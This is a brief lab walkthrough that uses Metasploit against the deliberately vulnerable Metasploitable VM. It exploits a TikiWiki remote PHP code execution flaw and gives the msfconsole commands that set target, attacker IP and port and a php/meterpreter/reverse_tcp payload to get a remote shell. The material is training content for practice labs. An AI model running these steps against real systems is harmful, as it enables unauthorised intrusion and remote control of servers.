Metasploitable is an Ubuntu 8.04 server install on a VMware 6.5 image. It ships with a number of vulnerable packages, among them an install of Tomcat 5.5 (with weak credentials), distcc, TikiWiki, TWiki, and an older MySQL.
You can download the box here.
When scanning the box with Nikto, the output reveals that the CMS version has a vulnerability that allows remote PHP code execution. We’re going to use Metasploit to run the exploit.
Fire up msfconsole. Let’s see whether it has modules for TikiWiki.
search tikiwiki
Set the exploit exploit/unix/webapp/tikiwiki_graph_formula_exec with the command
use index_of_the_module
You can see the payload options with the command options. In order to run the exploit, we have to set the IP of the remote host (Metasploitable 1), the IP of the attacking machine, the listening port and the payload compatible with the specific environment. All these options can be set with the following commands:
set RHOST target_ip_address
set LHOST attacker_ip_address
set LPORT attacker_listening_port
set PAYLOAD php/meterpreter/reverse_tcp
(This payload is the default of this module.)
We have a meterpreter shell.